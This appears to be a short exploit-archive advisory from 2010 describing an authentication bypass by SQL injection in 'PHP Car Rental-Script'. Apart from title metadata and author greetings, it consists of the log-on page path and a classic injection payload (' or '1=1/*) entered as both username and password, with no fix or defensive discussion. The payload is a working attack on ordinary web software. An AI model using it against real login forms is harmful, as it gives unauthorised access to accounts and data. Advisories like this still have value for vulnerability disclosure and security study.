[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Car Rental-Script (Auth Bypass) SQL Injection
# Published : 2010-02-03
# Author : Hamza 'MizoZ' N.
# Previous Title : KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
# Next Title : Hipergate v4.0.12 Multiple Vulnerabilities
/*
Name : PHP Car Rental-Script (Auth Bypass) SQL Injection
WebSite : http://www.carrentalphpscript.com/
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com
Greetz : Zuka , Achille Dark3r , int_0x80 , geeksec.com<http://geeksec.com> ...
*/
- Log-On page :
http://server/[PATH]/index.php?plugin_id=4
username = ' or '1=1/*
password = ' or '1=1/*